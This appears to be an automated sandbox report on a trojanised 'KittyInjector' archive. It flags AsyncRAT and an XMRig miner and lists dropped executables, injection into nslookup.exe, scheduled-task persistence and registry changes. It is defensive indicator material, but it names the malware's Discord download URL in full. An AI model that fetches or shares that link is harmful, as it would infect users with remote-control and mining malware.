asyncrat | hxxps://cdn[.]discordapp[.]com/attachments/1003969227297935410/1048654839548223488/KittyInjector[.]rar

Analysis

max time kernel
959s
max time network
964s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
04-12-2022 04:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://cdn.discordapp.com/attachments/1003969227297935410/1048654839548223488/KittyInjector.rar

Score

10^/10

asyncrat xmrig miner rat

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/4416-149-0x0000000000EB0000-0x0000000000EC2000-memory.dmp	asyncrat

XMRig Miner payload 6 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/3100-176-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/3100-178-0x00000001402E255C-mapping.dmp	xmrig
behavioral1/memory/3100-179-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/3100-180-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/3100-183-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig
behavioral1/memory/3100-186-0x0000000140000000-0x000000014074D000-memory.dmp	xmrig

Executes dropped EXE 9 IoCs

Processes:

ChromeRecovery.exeKittyInjector.exeanus.exemodule.exeInjector_1.exesvhost.exesihost64.exenslookup.exesihost64.exe

pid	process
5036	ChromeRecovery.exe
1876	KittyInjector.exe
1604	anus.exe
4416	module.exe
3616	Injector_1.exe
2284	svhost.exe
4440	sihost64.exe
404	nslookup.exe
2460	sihost64.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

KittyInjector.exeanus.exemodule.exenslookup.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	KittyInjector.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	anus.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	module.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	nslookup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

nslookup.exe

description pid process target process

PID 404 set thread context of 3100 404 nslookup.exe nslookup.exe

description	pid	process	target process
PID 404 set thread context of 3100	404	nslookup.exe	nslookup.exe

Drops file in Program Files directory 8 IoCs

Processes:

elevation_service.exechrome.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\_metadata\verified_contents.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\KittyInjector.exe	chrome.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\ChromeRecoveryCRX.crx	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\ChromeRecovery.exe	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\ChromeRecovery.exe	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\manifest.json	elevation_service.exe
File opened for modification	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\manifest.json	elevation_service.exe
File created	C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir668_2084849405\_metadata\verified_contents.json	elevation_service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

204 4192 WerFault.exe
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

2460 schtasks.exe
4768 schtasks.exe
548 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4048 timeout.exe

pid	pid_target	process	target process
204	4192	WerFault.exe

pid	process
2460	schtasks.exe
4768	schtasks.exe
548	schtasks.exe

pid	process
4048	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 89be75672cbed801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 16 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{BBC2029C-7388-11ED-A0EE-7ADCB3813C8F} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{726AD5AE-0E13-470C-BD2E-72365AE422C0}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe

Modifies registry class 64 IoCs

Processes:

OpenWith.exechrome.exechrome.exechrome.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "7"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4"	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000000000002000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByKey:PID = "2"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	OpenWith.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = ffffffff	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\LogicalViewMode = "2"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\NodeSlot = "2"	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	OpenWith.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	OpenWith.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads"	OpenWith.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exemodule.exeanus.exenslookup.exeInjector_1.exechrome.exechrome.exe

pid	process
1116	chrome.exe
1116	chrome.exe
4756	chrome.exe
4756	chrome.exe
3508	chrome.exe
3508	chrome.exe
5016	chrome.exe
5016	chrome.exe
1276	chrome.exe
1276	chrome.exe
4204	chrome.exe
4204	chrome.exe
952	chrome.exe
952	chrome.exe
4564	chrome.exe
4564	chrome.exe
2456	chrome.exe
2456	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4964	chrome.exe
4716	chrome.exe
4716	chrome.exe
2196	chrome.exe
2196	chrome.exe
4612	chrome.exe
4612	chrome.exe
1128	chrome.exe
1128	chrome.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
4416	module.exe
1604	anus.exe
1604	anus.exe
1604	anus.exe
404	nslookup.exe
404	nslookup.exe
404	nslookup.exe
3616	Injector_1.exe
3616	Injector_1.exe
5064	chrome.exe
5064	chrome.exe
2996	chrome.exe
2996	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 5 IoCs

Processes:

OpenWith.exe7zFM.exe7zFM.exechrome.exechrome.exe

pid process

1432 OpenWith.exe
4356 7zFM.exe
3488 7zFM.exe
5064 chrome.exe
2996 chrome.exe
Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

652

pid	process
1432	OpenWith.exe
4356	7zFM.exe
3488	7zFM.exe
5064	chrome.exe
2996	chrome.exe

pid	process
652

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs

Processes:

chrome.exe

pid	process
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

7zFM.exe7zG.exeAUDIODG.EXEanus.exemodule.exesvhost.exenslookup.exenslookup.exe7zFM.exe

description	pid	process
Token: SeRestorePrivilege	4356	7zFM.exe
Token: 35	4356	7zFM.exe
Token: SeRestorePrivilege	4592	7zG.exe
Token: 35	4592	7zG.exe
Token: SeSecurityPrivilege	4592	7zG.exe
Token: SeSecurityPrivilege	4592	7zG.exe
Token: SeSecurityPrivilege	4356	7zFM.exe
Token: SeSecurityPrivilege	4356	7zFM.exe
Token: 33	4860	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4860	AUDIODG.EXE
Token: SeDebugPrivilege	1604	anus.exe
Token: SeDebugPrivilege	4416	module.exe
Token: SeDebugPrivilege	2284	svhost.exe
Token: SeDebugPrivilege	404	nslookup.exe
Token: SeLockMemoryPrivilege	3100	nslookup.exe
Token: SeLockMemoryPrivilege	3100	nslookup.exe
Token: SeRestorePrivilege	3488	7zFM.exe
Token: 35	3488	7zFM.exe
Token: SeSecurityPrivilege	3488	7zFM.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

iexplore.exe7zFM.exechrome.exe7zG.exednSpy.exe7zFM.exe

pid	process
5028	iexplore.exe
5028	iexplore.exe
4356	7zFM.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4592	7zG.exe
4356	7zFM.exe
4356	7zFM.exe
4356	7zFM.exe
4356	7zFM.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4980	dnSpy.exe
3488	7zFM.exe
3488	7zFM.exe
3488	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

chrome.exe

pid	process
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe
4756	chrome.exe

Suspicious use of SetWindowsHookEx 61 IoCs

Processes:

iexplore.exeIEXPLORE.EXEOpenWith.exeOpenWith.exechrome.exechrome.exe

pid	process
5028	iexplore.exe
5028	iexplore.exe
